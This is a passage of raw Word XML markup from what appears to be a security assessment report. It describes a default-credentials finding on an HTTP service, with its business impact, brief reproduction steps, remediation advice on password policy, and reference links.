          <w:p w:rsidR="17D55FCD" w:rsidP="0D325B6E" w:rsidRDefault="17D55FCD" w14:paraId="553B9E57" w14:textId="27C0A338">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:strike w:val="0"/>
                <w:dstrike w:val="0"/>
                <w:noProof w:val="0"/>
                <w:color w:val="0070C0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="R690ffacc22204280">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="17D55FCD">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>T1082: Default Credentials</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="74860B39">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CD35005"/>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B11B1B2" w:rsidP="0D325B6E" w:rsidRDefault="0B11B1B2" w14:paraId="3F1E61A5" w14:textId="7820BAE8">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:bidi w:val="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidR="0B11B1B2">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8EAF1D" w:rsidP="0D325B6E" w:rsidRDefault="268EAF1D" w14:paraId="1C06951B" w14:textId="171D7AA7">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:bidi w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="0070C0"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="R5a7d54c6a7f44d24">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="268EAF1D">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>M0801: Access Management</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w:rsidR="7D4C9C9B" w:rsidP="0D325B6E" w:rsidRDefault="7D4C9C9B" w14:paraId="176277FC" w14:textId="30B50FA4">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:bidi w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:strike w:val="0"/>
                <w:dstrike w:val="0"/>
                <w:noProof w:val="0"/>
                <w:color w:val="0070C0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="R4840d9657e5b42cb">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="7D4C9C9B">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>M0927: Password Policies</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="42AEDE6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6802063" w14:textId="3080DB2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CDA4041" w14:textId="3B08A4ED">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F872E2E" w14:textId="2282B1FD">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0E5E8C67" w:rsidP="0D325B6E" w:rsidRDefault="0E5E8C67" w14:paraId="6221A66D" w14:textId="26803E0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389CBD1" w:rsidP="0D325B6E" w:rsidRDefault="4389CBD1" w14:paraId="5F404D5B" w14:textId="1E6D476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gain authorized access to the </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HTTP</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389CBD1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>service</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 xml:space="preserve"> by logging in with well-known and </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="66E574BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>publicly</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 xml:space="preserve"> available default credentials. </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="0E85EE58">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>As t</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hese</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="4389CBD1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> credentials are </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pub</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="25D78426">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>lic</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="25D78426">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y</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330FF21">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>accessible,</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E824224">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>they are</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 xml:space="preserve"> easily guessable </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by</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="6B309C4D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> an attacker.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="3102ED0F" w14:textId="648E544C">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E5E8C67" w:rsidP="0D325B6E" w:rsidRDefault="0E5E8C67" w14:paraId="532AE343" w14:textId="0AD8E7FE">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Business Impa</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="034C52C6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>c</w:t>
      </w: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t</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6C24E656" w:rsidP="0D325B6E" w:rsidRDefault="6C24E656" w14:paraId="2DC573FC" w14:textId="743B06C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C24E656">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leverage these default credentials to gain unauthorized access to the </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="6C24E656">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="6C24E656">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giving them </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="6C24E656">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>an initial</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="6C24E656">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> foothold into the network. This allows them to potentially obtain sensitive information or administrative functionality.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="2F6C30E5" w14:textId="62AD170A">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0E5E8C67" w:rsidP="0D325B6E" w:rsidRDefault="0E5E8C67" w14:paraId="745DADAB" w14:textId="14726475">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E5E8C67" w:rsidP="0D325B6E" w:rsidRDefault="0E5E8C67" w14:paraId="08CB9F28" w14:textId="568B36D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5E8C67">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6A9A58E8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Go to </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="6A9A58E8">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D325B6E" w:rsidR="6A9A58E8">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w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="6A9A58E8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>br</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="6A9A58E8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>owser</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6A9A58E8" w:rsidP="0D325B6E" w:rsidRDefault="6A9A58E8" w14:paraId="2784454E" w14:textId="063F30E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A9A58E8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Step 2: Login with default credentials found here:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="7AF74404" w14:textId="0A47D82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E5E8C67" w:rsidP="0D325B6E" w:rsidRDefault="0E5E8C67" w14:paraId="1EA2FAF2" w14:textId="5F6B074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842281C" w:rsidP="0D325B6E" w:rsidRDefault="5842281C" w14:paraId="06306C66" w14:textId="4554D20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842281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842281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D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="4DB4C43E" w14:textId="4503E3B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p>
    <w:p w:rsidR="086C9EFC" w:rsidP="0D325B6E" w:rsidRDefault="086C9EFC" w14:paraId="1B347D6F" w14:textId="5763CA03">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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6C9EFC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Immediately </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="086C9EFC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>chang</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="2C025CDB">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086C9EFC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> d</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efault credentials </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="6289D0A8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">for all applications on the network </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to stro</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g</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u</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iq</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ue</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 p</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as</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swor</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in</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ac</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co</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rd</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an</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ce </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="67BDB202">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>wit</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="67BDB202">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 a </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="74E98FE8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">set </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password policy</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="54A7AFEF">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2E76C4C2" w:rsidP="0D325B6E" w:rsidRDefault="2E76C4C2" w14:paraId="695EC374" w14:textId="354A91EA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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E76C4C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Always </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="2E76C4C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>identify</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="2E76C4C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> and change default credentials </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="10EAE6A1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>before putting any service or device on the network.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="7303901D" w14:textId="3A1A8ACC">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E5E8C67" w:rsidP="0D325B6E" w:rsidRDefault="0E5E8C67" w14:paraId="6484FABA" w14:textId="1F65F23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E5E8C67">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E4E34F5" w:rsidP="0D325B6E" w:rsidRDefault="6E4E34F5" w14:paraId="7B361156" w14:textId="746174AE">
      <w:pPr>
        <w:spacing w:after="0" w:afterAutospacing="off"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="R43e8eb7254ff490d">
        <w:r w:rsidRPr="0D325B6E" w:rsidR="6E4E34F5">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:i w:val="0"/>
            <w:iCs w:val="0"/>
            <w:caps w:val="0"/>
            <w:smallCaps w:val="0"/>
            <w:noProof w:val="0"/>
            <w:color w:val="0070C0"/>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Palo Alto Networks - Multi Factor Authentication</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="44C70B14" w:rsidP="0D325B6E" w:rsidRDefault="44C70B14" w14:paraId="1F67F06C" w14:textId="43575ED4">
      <w:pPr>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:strike w:val="0"/>
          <w:dstrike w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="R36c16297848d4cf7">
        <w:r w:rsidRPr="0D325B6E" w:rsidR="44C70B14">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:i w:val="0"/>
            <w:iCs w:val="0"/>
            <w:strike w:val="0"/>
            <w:dstrike w:val="0"/>
            <w:noProof w:val="0"/>
            <w:color w:val="0070C0"/>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>DigiCert - Creating Password Policy Best Practices</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="63B592EA" w14:textId="1A757EAC">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="5C0C8A4B" w14:textId="3356576D">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="041C164C" w:rsidP="0D325B6E" w:rsidRDefault="041C164C" w14:paraId="647AFDEF" w14:textId="07784452">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607445314" w:id="1066265083"/>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="041C164C">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:color w:val="FFC000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>▌</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="041C164C">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:color w:val="0F4761" w:themeColor="accent1" w:themeTint="FF" w:themeShade="BF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>M1:</w:t>
      </w:r>
      <w:bookmarkStart w:name="_Toc1555531649" w:id="1990018057"/>
